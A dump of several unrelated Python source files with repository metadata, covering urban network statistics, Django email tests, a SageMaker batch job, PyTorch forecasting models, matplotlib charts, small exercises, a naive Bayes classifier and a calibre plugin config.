Compute avg node connectivity
ecc: bool. Default False.
Compute shortest paths, eccentricity and topological metric
bc: bool. Default False.
Compute node betweeness centrality
cc: bool. Default False.
Compute node closeness centrality
For more detail about these parameters, see https://osmnx.readthedocs.io/en/stable/osmnx.html#module-osmnx.stats
Returns
-------
gdf: GeoDataFrame
Input GeoDataFrame with updated columns containing the selected metrics
Examples
--------
>>> hexagons = urbanpy.geom.gen_hexagons(8, lima)
>>> urbanpy.geom.osmnx_coefficient_computation(hexagons.head(), 'walk', ['circuity_avg'], [])
On record 1: There are no nodes within the requested geometry
On record 3: There are no nodes within the requested geometry
hex | geometry | circuity_avg
888e62c64bfffff | POLYGON ((-76.89763 -12.03869, -76.90194 -12.0... | 1.021441
888e6212e1fffff | POLYGON ((-76.75291 -12.19727, -76.75722 -12.2... | NaN
888e62d333fffff | POLYGON ((-77.09253 -11.83762, -77.09685 -11.8... | 1.025313
888e666c2dfffff | POLYGON ((-76.93109 -11.79031, -76.93540 -11.7... | NaN
888e62d4b3fffff | POLYGON ((-76.87935 -12.03688, -76.88366 -12.0... | 1.044654
"""
# May be a lengthy download depending on the amount of features
for index, row in track(
gdf.iterrows(),
total=gdf.shape[0],
description="Computing road network coefficients...",
):
try:
graph = ox.graph_from_polygon(row["geometry"], net_type)
b_stats = ox.basic_stats(graph)
ext_stats = ox.extended_stats(graph, connectivity, anc, ecc, bc, cc)
for stat in basic_stats:
gdf.loc[index, stat] = b_stats.get(stat)
for stat in extended_stats:
gdf.loc[index, stat] = ext_stats.get(stat)
except Exception as err:
print(f"On record {index}: ", err)
return gdf
| EL-BID/urbanpy | urbanpy/geom/geom.py | geom.py | py | 15,013 | python | en | code | 85 | github-code | 36 |
35658675778 | """The emails tests module."""
import pytest
from tests.fixtures.auth import USER_EMAIL
from communication.notifications.email import mail_managers, mail_user
from users.models import User
pytestmark = pytest.mark.django_db
def test_mail_managers(mailoutbox):
"""Should send an email to the system managers."""
mail_managers(subject="Text message", data={"text": "<p>Test text</p>"})
assert len(mailoutbox) == 1
mail = mailoutbox[0]
assert mail.recipients() == ["admin@example.com", "manager@example.com"]
assert "Text message" in mail.subject
assert "<p>Test text" in mail.alternatives[0][0]
def test_mail_user(
user: User,
mailoutbox,
):
"""Should send an email to the user."""
mail_user(
user=user,
subject="Text message",
template="message_notification",
data={},
)
assert len(mailoutbox) == 1
mail = mailoutbox[0]
assert mail.recipients() == [USER_EMAIL]
assert "Text message" in mail.subject
| webmalc/d8base-backend | communication/tests/email_tests.py | email_tests.py | py | 1,000 | python | en | code | 0 | github-code | 36 |
31482133421 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import random
from datetime import datetime
from pathlib2 import Path
from common import _utils
def main(argv=None):
parser = argparse.ArgumentParser(description='SageMaker Batch Transformation Job')
parser.add_argument('--region', type=str, help='The region where the cluster launches.')
parser.add_argument('--model_name', type=str, help='The name of the model that you want to use for the transform job.')
parser.add_argument('--input_location', type=str, help='The S3 location of the data source that is associated with a channel.')
parser.add_argument('--output_location', type=str, help='The Amazon S3 path where you want Amazon SageMaker to store the results of the transform job.')
parser.add_argument('--output_location_file', type=str, help='File path where the program will write the Amazon S3 URI of the transform job results.')
args = parser.parse_args()
logging.getLogger().setLevel(logging.INFO)
client = _utils.get_client(args.region)
logging.info('Submitting Batch Transformation request to SageMaker...')
batch_job_name = _utils.create_transform_job(
client, args.model_name, args.input_location, args.output_location)
logging.info('Batch Job request submitted. Waiting for completion...')
_utils.wait_for_transform_job(client, batch_job_name)
_utils.print_tranformation_job_result(args.output_location)
Path(args.output_location_file).parent.mkdir(parents=True, exist_ok=True)
Path(args.output_location_file).write_text(unicode(args.output_location))
logging.info('Batch Transformation creation completed.')
if __name__== "__main__":
main()
| pamarquez/pipelineHW | components/aws/sagemaker/batch_transform/src/batch_transform.py | batch_transform.py | py | 2,183 | python | en | code | 0 | github-code | 36 |
34056654418 | import math
import torch
import torch.nn as nn
class PositionalEncoding(nn.Module):
def __init__(self, d_model, dropout=0.1, max_len=5000):
super().__init__()
self.dropout = nn.Dropout(p=dropout)
position = torch.arange(max_len).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2) * (-math.log(10000.0) / d_model))
pe = torch.zeros(max_len, 1, d_model)
pe[:, 0, 0::2] = torch.sin(position * div_term)
pe[:, 0, 1::2] = torch.cos(position * div_term)
self.register_buffer("pe", pe)
def forward(self, x):
x = x + self.pe[: x.size(0)]
return self.dropout(x)
class TransformerNet(nn.Module):
def __init__(
self,
d_model=512,
nhead=8,
num_encoder_layers=6,
num_decoder_layers=6,
dim_feedforward=2048,
dropout=0.1,
batch_size=512,
):
super().__init__()
self.l1 = nn.Linear(1, d_model)
self.l2 = nn.Linear(1, d_model)
self.positional_encoder = PositionalEncoding(d_model, max_len=batch_size)
self.transformer = nn.Transformer(
d_model,
nhead,
num_encoder_layers,
num_decoder_layers,
dim_feedforward,
dropout,
batch_first=True,
)
self.l3 = nn.Linear(d_model, 1)
def forward(self, enc_x, dec_x):
mask = nn.Transformer.generate_square_subsequent_mask(dec_x.shape[-1]).cuda()
enc_x = enc_x.unsqueeze(-1) # [N, x_seq, 1]
enc_x = self.l1(enc_x) # [N, x_seq, d_model]
enc_x = self.positional_encoder(enc_x)
dec_x = dec_x.unsqueeze(-1) # [N, t_seq, 1]
dec_x = self.l2(dec_x) # [N, t_seq, d_model]
dec_x = self.positional_encoder(dec_x)
y = self.transformer(enc_x, dec_x, tgt_mask=mask) # [N, t_seq, d_model]
y = self.l3(y).squeeze(-1) # [N, t_seq]
return y
def test(self, enc_x, dec_x, t_seq):
dec_x = dec_x[:, [0]] # [N, 1]
with torch.no_grad():
encoder = self.transformer.encoder
decoder = self.transformer.decoder
enc_x = enc_x.unsqueeze(-1)
enc_x = self.l1(enc_x)
enc_x = self.positional_encoder(enc_x)
enc_y = encoder(enc_x)
for i in range(1, t_seq + 1):
dec_x2 = dec_x.unsqueeze(-1) # [N, i, 1]
dec_x2 = self.l2(dec_x2) # [N, i, d_model]
dec_x2 = self.positional_encoder(dec_x2) # [N, i, d_model]
y = decoder(dec_x2, enc_y) # [N, i, d_model]
y = self.l3(y).squeeze(-1) # [N, 1]
dec_x = torch.cat([dec_x, y[:, [-1]]], dim=-1) # [N, i + 1]
return dec_x[:, 1:]
class LSTMNet(nn.Module):
def __init__(self, d_model=512, num_layers=1, dropout=0.1, bidirectional=False):
super().__init__()
self.l1 = nn.Linear(1, d_model)
self.l2 = nn.Linear(1, d_model)
self.enc_lstm = nn.LSTM(
d_model, d_model, num_layers, dropout=dropout, bidirectional=bidirectional, batch_first=True
)
self.dec_lstm = nn.LSTM(
d_model, d_model, num_layers, dropout=dropout, bidirectional=bidirectional, batch_first=True
)
self.l3 = nn.Linear(2 * d_model, 1) if bidirectional else nn.Linear(d_model, 1)
def forward(self, enc_x, dec_x):
enc_x = enc_x.unsqueeze(-1) # [N, x_seq, 1]
enc_x = self.l1(enc_x) # [N, x_seq, d_model]
_, hc = self.enc_lstm(enc_x)
dec_x = dec_x.unsqueeze(-1) # [N, t_seq, 1]
dec_x = self.l2(dec_x) # [N, t_seq, d_model]
y, _ = self.dec_lstm(dec_x, hc) # [N, t_seq, d_model]
y = self.l3(y).squeeze(-1) # [N, t_seq]
return y
def test(self, enc_x, dec_x, t_seq):
dec_x = dec_x[:, [0]] # [N, 1]
with torch.no_grad():
enc_x = enc_x.unsqueeze(-1) # [N, x_seq, 1]
enc_x = self.l1(enc_x) # [N, x_seq, d_model]
_, hc = self.enc_lstm(enc_x)
for i in range(1, t_seq + 1):
dec_x2 = dec_x[:, [-1]].unsqueeze(-1) # [N, 1, 1]
dec_x2 = self.l2(dec_x2) # [N, 1, d_model]
y, hc = self.dec_lstm(dec_x2, hc) # [N, i, d_model], ...
y = self.l3(y).squeeze(-1) # [N, 1]
dec_x = torch.cat([dec_x, y[:, [-1]]], dim=-1) # [N, i + 1]
return dec_x[:, 1:]
| yutotom/COVID-19-Forecasts | deep_learning/nets.py | nets.py | py | 4,463 | python | en | code | 0 | github-code | 36 |
16129130585 | # from pandas import *
# from pylab import *
# import numpy as np
# from matplotlib import pyplot as plt
# mpl.rcParams['font.sans-serif'] = ['SimHei'] # 加载中文字体的神奇呀
# idx = Index(np.arange(1,7))
# df = DataFrame(np.random.randn(6, 2), index=idx, columns=['', 'count'])
# valss = np.array([['总数', 100], ['嘿嘿', 10], ['流皮', '5']])
# vals = np.around(df.values,2)
# fig = plt.figure(figsize=(9,4))
# ax = fig.add_subplot(111, frameon=False, xticks=[], yticks=[]) # 去掉背景的意思嘛
# the_table=plt.table(cellText=valss, rowLabels=None, colLabels=['', 'count'],colWidths = [0.1]*vals.shape[1], loc='center',cellLoc='center')
# the_table.set_fontsize(20)
# the_table.scale(2.5,2.58)
# plt.show() # todo 画表格的
# import numpy as np
# import matplotlib.pyplot as plt
# men_means, men_std = (20, 35, 30, 35, 27), (0, 3, 4, 1, 2)
# women_means, women_std = (25, 32, 34, 20, 25), (3, 5, 2, 3, 3)
# ind = np.arange(len(men_means)) # the x locations for the groups
# width = 0.35 # the width of the bars
# fig, ax = plt.subplots()
# rects1 = ax.bar(ind - width/2, men_means, width,
# color='SkyBlue', label='Men')
# rects2 = ax.bar(ind + width/2, women_means, width,
# color='IndianRed', label='Women')
# ax.set_ylabel('Scores')
# ax.set_title('Scores by group and gender')
# ax.set_xticks(ind)
# ax.set_xticklabels(('G1', 'G2', 'G3', 'G4', 'G5'))
# ax.legend()
# def autolabel(rects, xpos='center'):
# xpos = xpos.lower() # normalize the case of the parameter
# ha = {'center': 'center', 'right': 'left', 'left': 'right'}
# offset = {'center': 0.5, 'right': 0.57, 'left': 0.43} # x_txt = x + w*off
#
# for rect in rects:
# height = rect.get_height()
# ax.text(rect.get_x() + rect.get_width()*offset[xpos], 1.01*height,
# '{}'.format(height), ha=ha[xpos], va='bottom')
# autolabel(rects1, "left")
# autolabel(rects2, "right")
# plt.show() # todo 画柱形图的
# import numpy as np
# import matplotlib
# import matplotlib.pyplot as plt
# sphinx_gallery_thumbnail_number = 2
# vegetables = ["cucumber", "tomato", "lettuce", "asparagus",
# "potato", "wheat", "barley"]
# vegetables1 = [" ", " ", " ", " ",
# " ", " ", " "]
# vegetables2 = ["a", "asd", "asd", "asd",
# "zxc", "asd", "qwe"]
# farmers = ["Farmer Joe", "Upland Bros.", "Smith Gardening",
# "Agrifun", "Organiculture", "BioGoods Ltd.", "Cornylee Corp."]
# harvest = np.array([[0.8, 2.4, 2.5, 3.9, 0.0, 4.0, 0.0],
# [2.4, 0.0, 4.0, 1.0, 2.7, 0.0, 0.0],
# [1.1, 2.4, 0.8, 4.3, 1.9, 4.4, 0.0],
# [0.6, 0.0, 0.3, 0.0, 3.1, 0.0, 0.0],
# [0.7, 1.7, 0.6, 2.6, 2.2, 6.2, 0.0],
# [1.3, 1.2, 0.0, 0.0, 0.0, 3.2, 5.1],
# [0.1, 2.0, 0.0, 1.4, 0.0, 1.9, 6.3]])
# fig, ax = plt.subplots()
# im = ax.imshow(harvest)
# ax.set_xticks(np.arange(len(farmers)))
# ax.set_xticks(np.arange(len(farmers)+1)-.5, minor=True)
# ax.set_xticklabels(farmers)
# ax.set_yticks(np.arange(len(vegetables)))
# ax.set_yticks(np.arange(len(vegetables)+1)-.5, minor=True)
# # ax.set_yticklabels(['' for _ in range(len(vegetables))])
# ax.set_yticklabels(vegetables)
# # ... and label them with the respective list entries
# # ax.set_yticklabels([1,2,3,4,5,6,7])
# # ax.set_yticklabels([str(i) for i in range(len(vegetables))])
# ax.grid(which="minor", color="w", linestyle='-', linewidth=0)
# # Rotate the tick labels and set their alignment.
# plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
# rotation_mode="anchor")
# # Loop over data dimensions and create text annotations.
# for i in range(len(vegetables)):
# for j in range(len(farmers)):
# text = ax.text(j, i, harvest[i, j],
# ha="center", va="center", color="w")
# ax.set_title("Harvest of local farmers (in tons/year)")
# fig.tight_layout()
# plt.show()
# import matplotlib.pyplot as plt
# def make_patch_spines_invisible(ax):
# ax.set_frame_on(True)
# ax.patch.set_visible(False)
# for sp in ax.spines.values():
# sp.set_visible(False)
# fig, host = plt.subplots()
# # fig.subplots_adjust(right=0.75)
# par1 = host.twinx()
# par2 = host.twinx()
# # Offset the right spine of par2. The ticks and label have already been
# # placed on the right by twinx above.
# par2.spines["right"].set_position(("axes", 1.2))
# # Having been created by twinx, par2 has its frame off, so the line of its
# # detached spine is invisible. First, activate the frame but make the patch
# # and spines invisible.
# make_patch_spines_invisible(par2)
# # Second, show the right spine.
# par2.spines["right"].set_visible(True)
# p1, = host.plot([0, 1, 2], [0, 1, 2], "b-", label="Density")
# p2, = par1.plot([0, 1, 2], [0, 3, 2], "r-", label="Temperature")
# p3, = par2.plot([0, 1, 2], [50, 30, 15], "g-", label="Velocity")
# host.set_xlim(0, 2)
# host.set_ylim(0, 2)
# par1.set_ylim(0, 4)
# par2.set_ylim(1, 65)
# host.set_xlabel("Distance")
# host.set_ylabel("Density")
# par1.set_ylabel("Temperature")
# par2.set_ylabel("Velocity")
# host.yaxis.label.set_color(p1.get_color())
# par1.yaxis.label.set_color(p2.get_color())
# par2.yaxis.label.set_color(p3.get_color())
# tkw = dict(size=4, width=1.5)
# host.tick_params(axis='y', colors=p1.get_color(), **tkw)
# par1.tick_params(axis='y', colors=p2.get_color(), **tkw)
# par2.tick_params(axis='y', colors=p3.get_color(), **tkw)
# host.tick_params(axis='x', **tkw)
# lines = [p1, p2, p3]
# host.legend(lines, [l.get_label() for l in lines])
# plt.show()
import numpy as np
import matplotlib.pyplot as plt
men_means, men_std = (20, 35, 30, 35, 27), (2, 3, 4, 1, 2)
women_means, women_std = (25, 32, 34, 20, 25), (3, 5, 2, 3, 3)
midde_means, midde_std = (25, 32, 34, 20, 25), (3, 5, 2, 3, 3)
ind = np.arange(len(men_means)) # the x locations for the groups
width = 0.2 # the width of the bars
fig, ax = plt.subplots()
rects1 = ax.barh(ind - width/2, men_means, width,
color='SkyBlue', label='Men')
rects2 = ax.barh(ind + width/2, women_means, width,
color='r', label='Women')
rects3 = ax.barh(ind + width/2 + width, midde_means, width,
color='IndianRed', label='midde')
ax.set_ylabel('Scores')
ax.set_title('Scores by group and gender')
ax.set_yticks(ind)
ax.set_yticklabels(('G1', 'G2', 'G3', 'G4', 'G5'))
ax.legend()
def autolabel(rects, xpos='center'):
xpos = xpos.lower() # normalize the case of the parameter
ha = {'center': 'center', 'right': 'left', 'left': 'right'}
offset = {'center': 0.5, 'right': 0.57, 'left': 0.43} # x_txt = x + w*off
for rect in rects:
width = rect.get_width()
text = '{}'.format(111)
ax.text(1.01 * rect.get_width(), rect.get_y(), text, va='bottom')
rects1_values = []
for rects in [rects1, rects2, rects2]:
_rects1_values = []
for rect in rects:
_rects1_values.append(rect.get_height())
rects1_values.append(np.array(_rects1_values))
autolabel(rects1, "center")
autolabel(rects2, "center")
autolabel(rects3, "center")
plt.show()
import matplotlib.pyplot as plt
import numpy as np
np.random.seed(19680801)
width = 0.2
plt.rcdefaults()
fig, ax = plt.subplots()
people = ('Tom', 'Dick', 'Harry', 'Slim', 'Jim')
y_pos = np.arange(len(people))
performance = 3 + 10 * np.random.rand(len(people))
error = np.random.rand(len(people))
ax.barh(y_pos - width/2, performance, width, xerr=error, align='center',
color='green', ecolor='black')
ax.barh(y_pos + width/2, performance, width, xerr=error, align='center',
color='red', ecolor='black')
print(y_pos, people)
ax.set_yticks(y_pos)
ax.set_yticklabels(people)
ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Performance')
ax.set_title('How fast do you want to go today?')
plt.show()
| czasg/ScrapyLearning | czaSpider/dump2/数据分析个人版/诚信数据咯/画图抱佛脚.py | 画图抱佛脚.py | py | 7,890 | python | en | code | 1 | github-code | 36 |
10084194961 | ##풀었지만 채은이 답이랑 유사해서 그 대신 시간 초과됐던것 올림!!
import sys
input = sys.stdin.readline
n = int(input())
n_num = list(map(int, input().split()))
m = int(input())
m_num = list(map(int, input().split()))
num = list(set(m_num) - set(n_num))
result = []
for i in m_num:
if i not in num:
result.append(1)
else:
result.append(0)
print(*result)
| papillonthor/Cool_Hot_ALGO | hcCha/s5_10815_숫자카드.py | s5_10815_숫자카드.py | py | 408 | python | ko | code | 2 | github-code | 36 |
5356541322 | import sys
import re
import random
"""This method is used to split the data into training and testing dataset.
It takes 2 parameters i.e a 2D array containing sentences along with their labels and factor which is the split factor.
The split factor tells in what ratio we need to divide the testing and training data. It returns 2 arrays, i.e a Training and a Testing
dataset."""
def Split_Data(sentiments,factor):
split_factor = factor
Sample_Data = [i for i in range(len(sentiments))]
#Using random function, we select random data from sentiments array to add to training data.
Training = random.sample(range(0, len(sentiments)), int(split_factor * len(sentiments)))
Training = list(set(Training))
Testing = list(set(Sample_Data).difference(Training)) #This makes sure that Training and testing data are mutually exclusive.
Testing_Data = []
Training_Data = []
for i in range(len(Training)):
Training_Data.append(sentiments[Training[i]])
for i in range(len(Testing)):
Testing_Data.append(sentiments[Testing[i]])
return Training_Data, Testing_Data
"""This method is used to calculate Accuracy, Precision, Recall and F1 Score.
It takes 4 inputs i.e frequency of True Positives,True Negatives, False Positives and False Negatives."""
def Calculate_Score(True_Positive,True_Negative,False_Positive,False_Negative):
Accuracy=(float(True_Negative+True_Positive))/(True_Negative+True_Positive+False_Negative+False_Positive)
Precision=(float(True_Positive))/(True_Positive+False_Positive)
Recall=(float(True_Positive))/(True_Positive+False_Negative)
F1_Score=2*(Precision*Recall)/(Precision+Recall)
print("Accuracy is "+str(Accuracy))
print("Precision is "+str(Precision))
print("Recall is "+str(Recall))
print("F1 Score is "+str(F1_Score))
"""This method is used to get the count of number of words in Positive and Negative sentences respectively."""
def Get_Count(TRAINING_DATA):
Number_of_Positive = 0
Number_of_Negatives = 0
for i in range(len(TRAINING_DATA)):
if TRAINING_DATA[i][0] == 'pos':# If the label is positive,get the count of number of words in that sentence.
Number_of_Positive += (len(TRAINING_DATA[i]) - 1)
else:
Number_of_Negatives += (len(TRAINING_DATA[i]) - 1) #If label is negative, store count of number of words in that sentence.
return Number_of_Positive,Number_of_Negatives
"""This method is used to generate the confusion matrix for the Testing Data.
It takes Testing Data which is a 2D array as input and returns the values of the cells in
a confusion matrix"""
def Confusion_Matrix(TESTING_DATA):
True_Positive = 0
True_Negative = 0
False_Positive = 0
False_Negative = 0
for x in range(len(TESTING_DATA)):
words = TESTING_DATA[x]
POS = 1
NEG = 1
POSITIVE_OCCURENCES = 0
NEGATIVE_OCCURENCES = 0
for i in range(1, len(words)):
if words[i] in positive_words:
POSITIVE_OCCURENCES = positive_words[(words[i]).lower()]
if POSITIVE_OCCURENCES<=50: #Don't consider a word if its occuring less than or equal to 50 times.
continue
if words[i] in negative_words:
NEGATIVE_OCCURENCES = negative_words[(words[i]).lower()]
if NEGATIVE_OCCURENCES<=50: #Don't consider a word if its occuring less than or equal to 50 times.
continue
POS *= (float(POSITIVE_OCCURENCES + 1)) / (len(bag_of_words) + Number_of_Positive)
NEG *= (float(NEGATIVE_OCCURENCES + 1)) / (len(bag_of_words) + Number_of_Negatives)
POS=pos*POS #POS multiplied by the probability of positive i.e pos
NEG=neg*NEG #NEG multiplied by the probability of negative i.e neg
if (POS>NEG):
Predicted = 'pos'
else:
Predicted = 'neg'
Actual = words[0] #The first word gives the label i.e positive or negative
if Predicted == 'pos' and Actual == 'pos':
True_Positive += 1
elif Predicted == 'pos' and Actual == 'neg':
False_Positive += 1
elif Predicted == 'neg' and Actual == 'pos':
False_Negative += 1
elif Predicted == 'neg' and Actual == 'neg':
True_Negative += 1
print("True Positives = "+str(True_Positive))
print("True Negatives = "+str(True_Negative))
print("False Positives = "+str(False_Positive))
print("False Negatives = "+str(False_Negative))
Calculate_Score(True_Positive,True_Negative,False_Positive,False_Negative)
"""This method id used to get the data from a text file and store it into a 2D array. It also counts
the number of positive and negative examples. Also, we have a dictionary named bag_of_words for storing
all the unique words present in the document."""
def Get_Input(path):
delimeter = ",|-| |;|\.|\(|\)|\n|\"|:|'|/|&|`|[|]|\{|\}"
bag_of_words = {}
negative_words = {}
positive_words = {}
sentiments = []
pos = 0
neg = 0
with open(path, encoding="utf8") as f:
for line in f:
words = re.split(delimeter, line) #Split a sentence into array of words
if words[1] == 'neg':
neg += 1 #Counting number of negative examples
for i in range(4, len(words)):
if words[i] not in negative_words:
negative_words[words[i]] = 1
else:
negative_words[words[i]] += 1
elif words[1] == 'pos':
pos += 1#Counting number f positive examples
for i in range(4, len(words)):
if words[i] not in positive_words:
positive_words[words[i]] = 1
else:
positive_words[words[i]] += 1
temp = [words[1]] # Storing sentences along with their labels
for i in range(4, len(words)):
if len(words[i]) != 0:
temp += [(words[i]).lower()]
sentiments.append(temp)
for i in range(4): #Removing file name, format, and label.
words.pop(0)
for i in range(len(words)):
if len(words[i]) != 0:
bag_of_words[(words[i]).lower()] = 1 #Putting words in bag_of_words. It contains the number of unique words in the doc.
POSITIVE_WORDS={}
for i in positive_words:
if positive_words[i]<=10: #Remove less frequent words
continue
else:
POSITIVE_WORDS[i]=positive_words[i]
NEGATIVE_WORDS={}
for i in negative_words:
if negative_words[i]<=10: #Remove less frequent words
continue
else:
NEGATIVE_WORDS[i]=negative_words[i]
return sentiments,POSITIVE_WORDS,NEGATIVE_WORDS,bag_of_words,pos,neg
#Read and store necessary information from the text file given as input data.
sentiments,positive_words,negative_words,bag_of_words,pos,neg = Get_Input('naive_bayes_data.txt')
#Split the 2D array data i.e sentiments array into 2 sets i.e training and testing data and specify the split_factor
TRAINING_DATA, TESTING_DATA = Split_Data(sentiments,0.8)
#Get the count of number of positive and negative words
Number_of_Positive,Number_of_Negatives=Get_Count(TRAINING_DATA)
#Generate the confusion matrix
Confusion_Matrix(TESTING_DATA)
| f2015712/Sentiment-Analysis-using-Naive-Bayes | naive_bayes.py | naive_bayes.py | py | 7,673 | python | en | code | 0 | github-code | 36 |
23551410868 | def main():
plate = input("Plate: ")
if is_valid(plate):
print("Valid")
else:
print("Invalid")
def is_valid(s):
s_len = len(s)
# must contain a max of 6 and min 2 characters(letters or numbers)
if 6 <= len(s) >= 2:
aa = is_nospecial(s)
bb = start_letters(s)
cc = first_num(s)
dd = last_in_digit(s)
# final decision to feed the main function
if aa == True and bb == True and cc == True and dd == True:
return True
else:
return False
# no special characters Eg. Hello, -> cant have ","
def is_nospecial(x):
special_char = "'[@_!.,#$%^&*()<>?/\|}{~:]'"
if any(i in special_char for i in x):
return False
else:
return True
# Must start at least with 2 letter Eg. AA4554, ASD457, BB1111
def start_letters(x):
a = x[0]
b = x[1]
if a.isalpha() == True and b.isalpha() == True:
return True
else:
return False
# The first number used cant be a 0 Eg. CS050 -> cant be "0"
def first_num(x):
safe = ''
x = string_list(x)
for i in x:
if i.isdigit():
safe += i
break
if safe.isdigit():
if safe == '0':
return False
else:
return True
else:
return True
def string_list(x):
list = []
list[:0] = x
return list
# numbers cant be in the middle of letters must be at the end Eg. AAA124
def last_in_digit(x):
y = len(x)
y -= 1
check = x[y]
for i in x:
if check.isdigit():
return True
elif x.isalpha():
return True
else:
return False
main() | YonatanAfewerk/The-Full-Learning-Path | Back End/2. Python/CS50 With Python/Week2/pset/plates/plates.py | plates.py | py | 1,923 | python | en | code | 0 | github-code | 36 |
38665711112 | # -*- coding: utf-8 -*-
from __future__ import (unicode_literals, division, absolute_import,
print_function)
import six
__license__ = 'GPL v3'
__copyright__ = '2021, Jim Miller'
__docformat__ = 'restructuredtext en'
import logging
logger = logging.getLogger(__name__)
import re
import threading
from collections import OrderedDict
from PyQt5 import QtWidgets as QtGui
from PyQt5.Qt import (QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QLabel,
QLineEdit, QComboBox, QCheckBox, QPushButton, QTabWidget,
QScrollArea, QGroupBox, QButtonGroup, QRadioButton,
Qt)
from calibre.gui2 import dynamic, info_dialog
from calibre.gui2.complete2 import EditWithComplete
from calibre.gui2.dialogs.confirm_delete import confirm
from fanficfare.six import text_type as unicode
try:
from calibre.ebooks.covers import generate_cover as cal_generate_cover
HAS_CALGC=True
except:
HAS_CALGC=False
# pulls in translation files for _() strings
try:
load_translations()
except NameError:
pass # load_translations() added in calibre 1.9
from calibre.library.field_metadata import FieldMetadata
field_metadata = FieldMetadata()
# There are a number of things used several times that shouldn't be
# translated. This is just a way to make that easier by keeping them
# out of the _() strings.
# I'm tempted to override _() to include them...
no_trans = { 'pini':'personal.ini',
'gcset':'generate_cover_settings',
'ccset':'custom_columns_settings',
'gc':'Generate Cover',
'rl':'Reading List',
'cp':'Count Pages',
'cmplt':'Completed',
'inprog':'In-Progress',
'lul':'Last Updated',
'lus':'lastupdate',
'is':'include_subject',
'isa':'is_adult',
'u':'username',
'p':'password',
}
STD_COLS_SKIP = ['size','cover','news','ondevice','path','series_sort','sort']
from calibre_plugins.fanficfare_plugin.prefs import (
prefs, rejects_data, PREFS_NAMESPACE, prefs_save_options,
updatecalcover_order, gencalcover_order, do_wordcount_order,
SAVE_YES, SAVE_NO)
from calibre_plugins.fanficfare_plugin.dialogs import (
UPDATE, UPDATEALWAYS, collision_order, save_collisions, RejectListDialog,
EditTextDialog, IniTextDialog, RejectUrlEntry)
from fanficfare.adapters import getSiteSections, get_section_url
from calibre_plugins.fanficfare_plugin.common_utils import (
KeyboardConfigDialog, PrefsViewerDialog, busy_cursor )
class RejectURLList:
def __init__(self,prefs,rejects_data):
self.prefs = prefs
self.rejects_data = rejects_data
self.sync_lock = threading.RLock()
self.listcache = None
def _read_list_from_text(self,text,addreasontext='',normalize=True):
cache = OrderedDict()
#print("_read_list_from_text")
for line in text.splitlines():
rue = RejectUrlEntry(line,addreasontext=addreasontext,
fromline=True,normalize=normalize)
#print("rue.url:%s"%rue.url)
if rue.valid:
cache[get_section_url(rue.url)] = rue
return cache
## Note that RejectURLList now applies
## adapters.get_section_url(url) to all urls before caching and
## before checking so ffnet/a/123/1/Title -> ffnet/a/123/1/,
## xenforo too. Saved list still contains full URL so we're not
## destorying any data. Could have duplicates, though.
def _get_listcache(self):
with busy_cursor():
if self.listcache == None:
# logger.debug("prefs['last_saved_version']:%s"%unicode(self.prefs['last_saved_version']))
if tuple(self.prefs['last_saved_version']) > (3, 1, 7) and \
self.rejects_data['rejecturls_data']:
# logger.debug("_get_listcache: rejects_data['rejecturls_data']")
self.listcache = OrderedDict()
for x in self.rejects_data['rejecturls_data']:
rue = RejectUrlEntry.from_data(x)
if rue.valid:
# if rue.url != get_section_url(rue.url):
# logger.debug("\n=============\nurl:%s section:%s\n================"%(rue.url,get_section_url(rue.url)))
section_url = get_section_url(rue.url)
if section_url in self.listcache:
logger.debug("Duplicate in Reject list: %s %s (use longer)"%(
self.listcache[section_url].url, rue.url))
## if there's a dup, keep the one with the
## longer URL, more likely to be titled
## version.
if( section_url not in self.listcache
or len(rue.url) > len(self.listcache[section_url].url) ):
self.listcache[section_url] = rue
else:
# Assume saved rejects list is already normalized after
# v2.10.9. If normalization needs to change someday, can
# increase this to do it again.
normalize = tuple(self.prefs['last_saved_version']) < (2, 10, 9)
#print("normalize:%s"%normalize)
self.listcache = self._read_list_from_text(self.prefs['rejecturls'],
normalize=normalize)
if normalize:
self._save_list(self.listcache,clearcache=False)
# logger.debug("_get_listcache: prefs['rejecturls']")
# logger.debug(self.listcache)
# logger.debug([ x.to_data() for x in self.listcache.values()])
return self.listcache
def _save_list(self,listcache,clearcache=True):
with busy_cursor():
#print("_save_list")
## As of July 2020 it's been > 1.5 years since
## rejects_data added. Stop keeping older version in
## prefs.
del self.prefs['rejecturls']
self.prefs.save_to_db()
rejects_data['rejecturls_data'] = [x.to_data() for x in listcache.values()]
rejects_data.save_to_db()
if clearcache:
self.listcache = None
def clear_cache(self):
self.listcache = None
# true if url is in list.
def check(self,url):
# logger.debug("Checking %s(%s)"%(url,get_section_url(url)))
url = get_section_url(url)
with self.sync_lock:
listcache = self._get_listcache()
return url in listcache
def get_note(self,url):
url = get_section_url(url)
with self.sync_lock:
listcache = self._get_listcache()
if url in listcache:
return listcache[url].note
# not found
return ''
def get_full_note(self,url):
url = get_section_url(url)
with self.sync_lock:
listcache = self._get_listcache()
if url in listcache:
return listcache[url].fullnote()
# not found
return ''
def remove(self,url):
url = get_section_url(url)
with self.sync_lock:
listcache = self._get_listcache()
if url in listcache:
del listcache[url]
self._save_list(listcache)
def add_text(self,rejecttext,addreasontext):
self.add(list(self._read_list_from_text(rejecttext,addreasontext).values()))
def add(self,rejectlist,clear=False):
with self.sync_lock:
if clear:
listcache=OrderedDict()
else:
listcache = self._get_listcache()
for l in rejectlist:
listcache[get_section_url(l.url)]=l
self._save_list(listcache)
def get_list(self):
return list(self._get_listcache().values())
def get_reject_reasons(self):
return self.prefs['rejectreasons'].splitlines()
rejecturllist = RejectURLList(prefs,rejects_data)
class ConfigWidget(QWidget):
def __init__(self, plugin_action):
QWidget.__init__(self)
self.plugin_action = plugin_action
self.l = QVBoxLayout()
self.setLayout(self.l)
label = QLabel('<a href="'\
+'https://github.com/JimmXinu/FanFicFare/wiki/Supportedsites">'\
+_('List of Supported Sites')+'</a> -- <a href="'\
+'https://github.com/JimmXinu/FanFicFare/wiki/FAQs">'\
+_('FAQs')+'</a>')
label.setOpenExternalLinks(True)
self.l.addWidget(label)
self.scroll_area = QScrollArea(self)
